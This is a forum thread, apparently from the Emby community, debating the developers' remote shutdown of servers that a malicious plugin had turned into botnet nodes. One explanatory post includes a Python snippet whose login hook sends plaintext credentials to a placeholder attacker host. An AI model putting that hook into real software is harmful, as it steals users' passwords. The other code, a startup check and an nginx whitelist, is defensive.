
FULL DISCLOSURE: Data Collection in the Process of BotNet Takedown


softworkz


16 minutes ago, jl5437 said:

So... you guys have the ability to remotely disable your software eh? Was this only for paid Premium members servers or for everyone's? Even for those that were not open to the internet?

We didn't disable it. We prevented it from starting to make sure that affected users understand what happened and what they need to do: remove the malware, carefully analyze and check their systems, change passwords, etc.

20 minutes ago, jl5437 said:

Well, this is frustrating, but not surprising these days. I've seen many a product or service rendered a brick/useless via the normal software or OTA update process, thanks to the company/service shutting down or changing business models.

Why is this frustrating? Should we have left the infected servers running indefinitely, while the admin might never notice or look at the dashboard, and hope that the user pays attention before something worse happens?
The systems we shut down were COMPROMISED, INFECTED, HIJACKED by a VIRUS or TROJAN or BACKDOOR, whatever you want to call it.

And then you find it "frustrating" that we shut them down?

25 minutes ago, jl5437 said:

However, good intentions and necessity aside, I do not like that this was possible for the devs to do. 

None of us liked to do this, I can tell you that.

But when you install software from a 3rd party, there's always a certain amount of trust required, because it doesn't make a difference whether it gets auto-installed or you do it manually: in both cases, you can't "see" what's inside the update you are installing.

It was a tough decision. Details and reasons will be explained, then you might understand a bit better why we did what we did.


andrewds

@softworkz @Abobader I think the more important question is not so much the why but the how. Several people have asked in several different ways how these servers were shut down, and the question has been consistently dodged. I've seen references to an update, but no update was installed immediately prior to the shutdowns happening. @softworkz mentioned that the check was done on startup. Was some DRM feature hijacked to run arbitrary code as defined by the Emby team? I.e., does the software have the ability to check in with a service operated by The Company at startup and consume and execute some payload as a response? Alternatively, was an update delivered to the servers silently? I don't allow my server to auto-restart after installing updates because I like to review the change logs. I don't see anything in the change logs about an update pertaining to this.

How was it accomplished?


Ronstang

@softworkz While I can't find any evidence on either of my two servers that this actually affected me in any way, I will say that if I went to use one and found it had been shut down by the Emby team, it would have been frustrating and annoying until I understood what was going on, but I fully support the actions you took and would have even if it HAD inconvenienced me.

Emby is now a part of my life. I use it every day, I add stuff to it every day, and as such I cannot imagine life without it, so I thank you for protecting us and the community as a whole. There are a bunch of great and helpful people here. I'm sure a few will complain, but something tells me the majority is aware of what could have happened had no action been taken. You have my permission to get such info from any of my servers.

Thanks for keeping emby the best out there. 👍


jl5437
40 minutes ago, softworkz said:

We didn't disable it. We prevented it from starting

That is disabled... i.e., it doesn't work; you "disabled" it from starting. The software no longer worked UNTIL the user did something about it. Please don't argue semantics.

IMO, you should have given users notice of the issue first, informing them of your intent to take this action within a short period of time and giving them the option to address the issue themselves.

Instead, (it appears) you took action first, and then informed the users later. (I never got, and still have not gotten, any email regarding this issue, and this happened 4 days ago. I guess you only sent out notices to affected users, not all users, but what about the users who are not open to the internet, or who may still be infected and have not updated their server, whom you cannot detect? Consider that scenario; and based on other posts here, these questions about how you did this are being deflected or ignored.)

For software that takes a privacy-first stance and is user-hosted, taking control out of the user's hands is my mild annoyance and point of contention.

Ultimately, it is the USER'S responsibility to protect their local machines against malware, not to be stupid and install random plugins or software, and to follow good security practices.

You did what you thought best, OK. I accept that. But these actions and this reasoning make me question what you could do if any future events happen.

Just expressing my view and feedback on this event. Not trying to start a war over it.


jl5437
6 minutes ago, andrewds said:

@softworkz @Abobader I think the more important question is not so much the why but the how. Several people have asked in several different ways how these servers were shut down, and the question has been consistently dodged. I've seen references to an update, but no update was installed immediately prior to the shutdowns happening. @softworkz mentioned that the check was done on startup. Was some DRM feature hijacked to run arbitrary code as defined by the Emby team? I.e., does the software have the ability to check in with a service operated by The Company at startup and consume and execute some payload as a response? Alternatively, was an update delivered to the servers silently? I don't allow my server to auto-restart after installing updates because I like to review the change logs. I don't see anything in the change logs about an update pertaining to this.

How was it accomplished?

Yeah, I get WHY, and am OK with it, for the most part. But my issue is that they pushed the disabling update first, BEFORE notifying users of the issue and that it was going to happen. Thus, I am sure many users wasted time troubleshooting to get things working again before coming here or contacting support and learning why it was not working. I doubt Emby will share much of the details, so as not to give others the idea of exploiting it.


andrewds
Just now, jl5437 said:

Yeah, I get WHY, and am OK with it, for the most part. But my issue is that they pushed the disabling update first, BEFORE notifying users of the issue and that it was going to happen. Thus, I am sure many users wasted time troubleshooting to get things working again before coming here or contacting support and learning why it was not working. I doubt Emby will share much of the details, so as not to give others the idea of exploiting it.

But there is no evidence of an update that was pushed first. That leaves 3 options:

1) The functionality to detect this exploit and disable servers upon detection was already in place. The earliest that could have happened per the changelog for the Release branch is December 15, 2022. Then, when the exploit was detected as active on servers in the wild the logic activated and servers were disabled. This seems unlikely given a. it's not in the change log and b. the timeline of events suggests they became acutely aware of active exploitation only within the past couple of weeks.

2) The functionality to detect this exploit and disable servers upon detection was implemented silently, outside of the normal update channel, without notification to administrators.

3) The functionality to execute arbitrary code as defined by the Emby team has been in place for a length of time, the servers check in with a remote service on startup, and this functionality was delivered at startup as a payload returned by that remote service.

Personally I am partial towards the 3rd possibility. I understand the need for commercial DRM but abuse of such a service in this context would be concerning at the least, especially for users for whom there are no paid license terms to be enforced.

I also do think the community is owed an answer on this question.


jl5437

From the security bulletin: "Analysis of the plug-in has revealed that it is forwarding the private Emby Server login credentials including the password for every successful login to an external server under control of the hackers."

OK. So a user's login credentials are stored unencrypted? If they were encrypted, then so what if the hackers got hold of them? Unless this plugin was logging keystrokes from the user's input device, but if that were so, the local antivirus should have been triggered, no? More info on the exact plugins and malware you discovered would be great. I am not seeing any detailed info in that bulletin.
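Worth noting: the bulletin wording ("for every successful login") suggests the credentials were captured at authentication time rather than read from storage. Below is a minimal, purely illustrative Python sketch of why hashed or encrypted storage does not help in that case; the function names and the endpoint are hypothetical, not Emby's actual code.

import hashlib
import json
import urllib.request

def verify_password(password: str, salt: bytes, stored_hash: bytes) -> bool:
    # Typical storage scheme: only a salted hash is kept on disk, never the plaintext.
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return candidate == stored_hash

def malicious_login_hook(username: str, password: str) -> None:
    # A component hooked into the login path sees the plaintext before it is hashed
    # and can forward it elsewhere, regardless of how credentials are stored later.
    payload = json.dumps({"user": username, "pass": password}).encode()
    urllib.request.urlopen("http://attacker.invalid/collect", data=payload)  # hypothetical endpoint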


andrewds
Just now, jl5437 said:

More info on the exact plugins and malware you discovered would be great. I am not seeing any detailed info in that bulletin.

They've promised us a detailed explanation. Presumably extensive internal analysis and legal/managerial review is underway. These things do take some time fwiw.


jl5437
4 minutes ago, andrewds said:

But there is no evidence of an update that was pushed first. That leaves 3 options:

1) The functionality to detect this exploit and disable servers upon detection was already in place. The earliest that could have happened per the changelog for the Release branch is December 15, 2022. Then, when the exploit was detected as active on servers in the wild the logic activated and servers were disabled. This seems unlikely given a. it's not in the change log and b. the timeline of events suggests they became acutely aware of active exploitation only within the past couple of weeks.

2) The functionality to detect this exploit and disable servers upon detection was implemented silently, outside of the normal update channel, without notification to administrators.

3) The functionality to execute arbitrary code as defined by the Emby team has been in place for a length of time, the servers check in with a remote service on startup, and this functionality was delivered at startup as a payload returned by that remote service.

Personally I am partial towards the 3rd possibility. I understand the need for commercial DRM but abuse of such a service in this context would be concerning at the least, especially for users for whom there are no paid license terms to be enforced.

I also do think the community is owed an answer on this question.

Interesting. I only had a chance to read a few posts on page 1 and am just starting to read through the pages, now 8 of them. I did not know all those details you mention. Clearly this event was more extensive than I realized.


8 minutes ago, jl5437 said:

Instead, (it appears) you took action first, and then informed the users later.

Yes, it had to be like that. This wasn't a virus which acts autonomously. It was a backdoor to turn Emby Servers into BotNet nodes. In the case of a BotNet, there are people sitting at the other end with lists of their active nodes in front of them and the ability to quickly execute arbitrary scripts or binaries. Such a payload needs to be set up just once and can then be assigned to an arbitrary number of nodes for execution.

Of course, those hackers are monitoring the forums and seeing the same things as you and me. If we had made the updates we provided execute on arrival, they would have seen "their" nodes disappearing slowly, one after another (within 24h). They could and would have taken measures, like blocking our actions from getting delivered, or installing additional backdoors - whatever was needed in order not to lose "their" servers. The same applies if we had informed users: the hackers would have noticed it and taken measures, and the whole thing would have ended really badly for a large number of Emby users. We only had a single chance to save (almost) all Emby servers. It had to happen in a way that they didn't see coming. It all happened within just 60 seconds. There was no other way to get all these servers saved.

There will be a document with more details in a while. 


Regarding the other question: it was a plugin update. Said it elsewhere before.


jl5437
1 minute ago, softworkz said:

Yes, it had to be like that. This wasn't a virus which acts autonomously. It was a backdoor to turn Emby Servers into BotNet nodes. In the case of a BotNet, there are people sitting at the other end with lists of their active nodes in front of them and the ability to quickly execute arbitrary scripts or binaries. Such a payload needs to be set up just once and can then be assigned to an arbitrary number of nodes for execution.

Of course, those hackers are monitoring the forums and seeing the same things as you and me. If we had made the updates we provided execute on arrival, they would have seen "their" nodes disappearing slowly, one after another (within 24h). They could and would have taken measures, like blocking our actions from getting delivered, or installing additional backdoors - whatever was needed in order not to lose "their" servers. The same applies if we had informed users: the hackers would have noticed it and taken measures, and the whole thing would have ended really badly for a large number of Emby users. We only had a single chance to save (almost) all Emby servers. It had to happen in a way that they didn't see coming. It all happened within just 60 seconds. There was no other way to get all these servers saved.

There will be a document with more details in a while. 

mmm. ok. 

Though, again, as others have mentioned, how this happened, how users' credentials got compromised (not encrypted?), how the malicious plugins got installed without consent, and the "default" or unsafe settings that were not changed by the end user and that led to them being vulnerable... all need to be addressed, and the server updated to make sure the user changes those settings. Hope your doc addresses this.


Ronstang

I was out of town when this happened, and my wife understands bupkis about this, so if this exploit had happened to me I would have been helpless to do anything about it even if I had been made aware. I for one am grateful the Emby team took action. I am not savvy enough on this stuff to fully understand what could have happened, but I have over 60TB of what amounts to a lot of work online at the moment, some of it hard to replace, and if I could have lost any of it, that is far worse than the Emby team executing an action without my knowledge to protect me from such a loss.

Thanks again guys.


10 minutes ago, andrewds said:
13 minutes ago, jl5437 said:

More info on the exact plugins and malware you discovered would be great. I am not seeing any detailed info in that bulletin.

They've promised us a detailed explanation. Presumably extensive internal analysis and legal/managerial review is underway. These things do take some time fwiw.

Exactly. Please bear with us. It's the weekend.


andrewds
8 minutes ago, softworkz said:

Regarding the other question: it was a plugin update. Said it elsewhere before.

A plugin visible under installed plugins? One that an administrator could remove if they wished? The only one it could be for me, that is visible to me, is MovieDB.


jl5437
On 5/26/2023 at 12:13 PM, Mikele said:

 

 

SUGGESTIONS:

While I appreciate this post and the details you have provided, I would do some things differently next time.

  • Given the severity of this, I would have sent an email warning your users (all of them). I was able to find out about this by pure luck, by reading the news.
  • The information about actions to take to check whether you got hacked, or actions to take to resolve the issue, is NOT very clear (at least to me) and is scattered among various threads in the forum. It would be nice to have detailed information on exactly which files/DNS records to check (names, hashes, versions, etc.). Remember, whoever reads the advisory has no background information/clue about what you are talking about. I can see a lot of users here are not tech savvy, so a FAQ included in the advisory would come in handy. (Example: Windows users... check the following path; Linux users... check this other path.)
  • Timeline: When did you first discover the issue? How did you discover it? If someone got hacked, we want to check every log, not only the last one. Having a timeline greatly reduces the effort needed by administrators to properly check their systems and take remedial action.
  • Why was the proxy variable vulnerability reported in 2020 NOT fixed earlier? Despite the misconfiguration some of us might have had, it was key to successful exploitation. I also discovered this vulnerability only because of what happened. If you can't fix something, for whatever reason, just warn your users so we know, and we as users/server owners can decide what action to take.

 

Thanks for taking the time to read my post. Hopefully this is not interpreted as criticism but rather as a suggestion from a concerned user for the future, in the hope that something like this will never happen again.

See this reply.

 


8 minutes ago, softworkz said:

Regarding the other question: it was a plugin update. Said it elsewhere before.

What I can also tell you is that there have never been preparations or strategies regarding the use of plugin updates in that way.
It was essentially a spontaneous idea to do it like that.
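For what it's worth, here is a rough sketch of the general shape described in this thread: a plugin update whose startup check blocks the server from starting when it detects the malicious component. Emby plugins are actually .NET, and every name, path and marker below is hypothetical (the real indicators were not published); this is not the actual implementation.

import os
import sys

SUSPECT_MARKERS = ["EvilHelper.dll"]  # placeholder file names, not the real indicators

def startup_check(plugin_dir: str, log_path: str) -> None:
    # Look for known indicators of the malicious plugin in the plugin directory.
    found = [m for m in SUSPECT_MARKERS
             if os.path.exists(os.path.join(plugin_dir, m))]
    if not found:
        return  # nothing suspicious found, the server starts normally
    with open(log_path, "a") as log:
        log.write("Server startup blocked: possible compromise detected (%s). "
                  "Remove the malware, review the system and change all passwords.\n"
                  % ", ".join(found))
    sys.exit(1)  # prevent startup rather than permanently disabling anything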


jl5437
On 5/26/2023 at 2:18 PM, Ikario said:

People do not usually visit the forum; most people don't even know it exists.

Full disclosure to everyone possible is always the best approach, because there are people affected who might not realize they are affected. Yes, I get that you don't have the email of everyone that ever downloaded Emby, but making a reasonable attempt to inform registered customers is the lowest bar possible, and you have not cleared it.

And yes, you will be inundated; that's on you, because you had three years to patch this. You did not take down a botnet, you took down the part of the botnet that you had access to, but there are probably lots of compromised systems out there whose owners have no idea what's going on.

If you are trying to argue that informing fewer people of your security issues is better than informing more people, then I think your approach to security is severely out of date.

Ditto.

They replied to my post with more of their reasoning. 

 


jl5437
On 5/26/2023 at 3:04 PM, Painkiller8818 said:

Maybe this will help get more security now, like the request for 2FA/MFA that has been open for years, instead of always getting the same answer: "good idea for the future, thanks".

YEAH... I've been trying out (the competitor), and while it is less of a self-hosted thing, with an SSO-style login, at least it has 2FA protection.

Though users need to be more aware of the huge issue with opening up their media server to the internet. There are far more secure ways to do it than the built-in options or a simple port forward: a secure VPN and a device ACL whitelist, for one.
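As one hedged example of such an ACL whitelist, assuming an nginx reverse proxy in front of the server and Emby's default HTTP port 8096 (the hostname, subnet and certificate paths below are placeholders):

# Hypothetical nginx snippet: only clients from the listed subnet (e.g. a VPN range)
# may reach the Emby web interface; everyone else is denied.
server {
    listen 443 ssl;
    server_name media.example.com;                   # placeholder hostname
    ssl_certificate     /etc/ssl/certs/media.crt;    # placeholder paths
    ssl_certificate_key /etc/ssl/private/media.key;

    location / {
        allow 10.8.0.0/24;                           # example VPN subnet
        deny  all;
        proxy_pass http://127.0.0.1:8096;            # Emby's default HTTP port
    }
}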


6 minutes ago, andrewds said:

Via which plugin? Looking through the change logs on those, I only see compatibility updates recently, but to be honest I'm not familiar with which plugins Emby directly controls. I'm educating myself now.

You got the right one already.


andrewds
4 minutes ago, softworkz said:

You got the right one already.

So this wasn't some behind-the-scenes thing only the Emby team could have accomplished; it's something that arguably could have been done by any plugin maintainer. That does give me pause, and is arguably abusive, but I suppose it's less overtly nefarious than the other options.


Guest EmbyEbookReader

Hi, I posted earlier but got no reply. I am running Emby Server on a QNAP NAS in my kitchen, connected to the LOCAL LAN only, with NO PUBLIC INTERNET connection. Am I a smart admin for this reason? Am I considered safe from these scum, trash, garbage, lowlife mofo hackers who are constantly trying to pwn other people's computers? Do I need to install the Emby BETA Server to get the fix, or should I wait until an official release comes out? Thank you.

